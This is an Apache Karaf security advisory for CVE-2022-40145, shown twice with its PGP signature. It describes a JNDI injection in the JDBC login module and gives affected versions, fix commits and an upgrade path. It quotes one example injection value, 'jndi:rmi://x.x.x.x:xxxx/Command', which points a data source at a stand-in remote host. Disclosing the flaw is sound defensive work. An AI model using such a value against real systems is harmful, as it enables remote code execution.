security/cve-2022-40145.txt - karaf-site - Git at Google

 -----BEGIN PGP SIGNED MESSAGE-----
 Hash: SHA512

 Hash: SHA512

 CVE-2022-40145: LDMP injection vulnerability in JDBC Login Module with JDK 8

 Severity: Low

 Vendor: The Apache Software Foundation

 Versions Affected: all versions of Apache Karaf prior to 4.3.8 or 4.4.2

 Description:

 The method org.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource
 uses InitialContext.lookup(jndiName) without filtering.
 User can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" +
 DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,
 "jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup.

 This vulnerable to a remote code execution (RCE) attack when a
 configuration uses a JNDI LDAP data source URI when an attacker has
 control of the target LDAP server.

 This has been fixed in revision:

 https://gitbox.apache.org/repos/asf?p=karaf.git;h=3819f48341
 https://gitbox.apache.org/repos/asf?p=karaf.git;h=2a933445d1

 Mitigation: Apache Karaf users should upgrade to 4.3.8 or 4.4.2
 or later as soon as possible, or use correct path.

 JIRA Tickets: https://issues.apache.org/jira/browse/KARAF-7568

 Credit: This issue was discovered and reported by Xun Bai <bbbbear68@gmail.com>
 -----BEGIN PGP SIGNATURE-----

 iQIzBAEBCgAdFiEEGqjPktQJpzOT0Lc2v/LuQsgoLnYFAmOW/5wACgkQv/LuQsgo
 LnaRtBAApAsUA7+zVl03d0pKa7Dd41uec9/voRZ9DSf0byRNdP/NQslAe6ZHEbqz
 /2pC3OuYj0yfBOWZ6O0uFb/iDt4+GqAz3mnZqRyDq+hcrdBY5VVxkOU+6uRtQ+Sm
 GfkDmMpJDLOURgG/xQa/G8QhOLiBtBErwB5pffMBoxC12HjBPfichM6KJuT55MGR
 yvR6CXsPnAlRkyhYPSkI9ehng2BbgnqCHtFQEZwXTViXoyz44/0NZc6URlytsO11
 a3/qbkP1p8nvwC5U5D4P/RKRLvN23HZFbFRRms/gNN+L9BKmv8krA3ESnNgi7Kcj
 7j+8gRYRzw/g41GuZARC435zCy8PH9ydoHZQnicSmQUpDzBwfCBpRFgiXpq3ztHt
 7sLa3rSOVWiJmQiAjQXM1Rr958TrBYRjV2UcTbb0AYEEiZQrAeYHq1M5Y+3pcV9h
 NsqEeVkDZji0nu1EoTbxcjIJjMo1G8u3k8VvKMAfrQ37gnCfOnKYYak47cwvZzmu
 suatXXUQffi/YR3wercn/1AyCqYmWPbrcvI2b41eDR5JtDX6OMtRdsshCVwjEh9v
 k2FSoPCM21+lpbXful4LwIMUppNfwrvn4VXsAsWG4I/g8kxbrFbI0Y/cJHPuCbU2
 ABpIBEZGXh8h8TMIimM7EGkKIiF2rlohKsavtgYoi91qrpmca70=
 =ozdD
 -----END PGP SIGNATURE-----
	-----BEGIN PGP SIGNED MESSAGE-----
	Hash: SHA512

	Hash: SHA512

	CVE-2022-40145: LDMP injection vulnerability in JDBC Login Module with JDK 8

	Severity: Low

	Vendor: The Apache Software Foundation

	Versions Affected: all versions of Apache Karaf prior to 4.3.8 or 4.4.2

	Description:

	The method org.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource
	uses InitialContext.lookup(jndiName) without filtering.
	User can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" +
	DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,
	"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup.

	This vulnerable to a remote code execution (RCE) attack when a
	configuration uses a JNDI LDAP data source URI when an attacker has
	control of the target LDAP server.

	This has been fixed in revision:

	https://gitbox.apache.org/repos/asf?p=karaf.git;h=3819f48341
	https://gitbox.apache.org/repos/asf?p=karaf.git;h=2a933445d1

	Mitigation: Apache Karaf users should upgrade to 4.3.8 or 4.4.2
	or later as soon as possible, or use correct path.

	JIRA Tickets: https://issues.apache.org/jira/browse/KARAF-7568

	Credit: This issue was discovered and reported by Xun Bai <bbbbear68@gmail.com>
	-----BEGIN PGP SIGNATURE-----

	iQIzBAEBCgAdFiEEGqjPktQJpzOT0Lc2v/LuQsgoLnYFAmOW/5wACgkQv/LuQsgo
	LnaRtBAApAsUA7+zVl03d0pKa7Dd41uec9/voRZ9DSf0byRNdP/NQslAe6ZHEbqz
	/2pC3OuYj0yfBOWZ6O0uFb/iDt4+GqAz3mnZqRyDq+hcrdBY5VVxkOU+6uRtQ+Sm
	GfkDmMpJDLOURgG/xQa/G8QhOLiBtBErwB5pffMBoxC12HjBPfichM6KJuT55MGR
	yvR6CXsPnAlRkyhYPSkI9ehng2BbgnqCHtFQEZwXTViXoyz44/0NZc6URlytsO11
	a3/qbkP1p8nvwC5U5D4P/RKRLvN23HZFbFRRms/gNN+L9BKmv8krA3ESnNgi7Kcj
	7j+8gRYRzw/g41GuZARC435zCy8PH9ydoHZQnicSmQUpDzBwfCBpRFgiXpq3ztHt
	7sLa3rSOVWiJmQiAjQXM1Rr958TrBYRjV2UcTbb0AYEEiZQrAeYHq1M5Y+3pcV9h
	NsqEeVkDZji0nu1EoTbxcjIJjMo1G8u3k8VvKMAfrQ37gnCfOnKYYak47cwvZzmu
	suatXXUQffi/YR3wercn/1AyCqYmWPbrcvI2b41eDR5JtDX6OMtRdsshCVwjEh9v
	k2FSoPCM21+lpbXful4LwIMUppNfwrvn4VXsAsWG4I/g8kxbrFbI0Y/cJHPuCbU2
	ABpIBEZGXh8h8TMIimM7EGkKIiF2rlohKsavtgYoi91qrpmca70=
	=ozdD
	-----END PGP SIGNATURE-----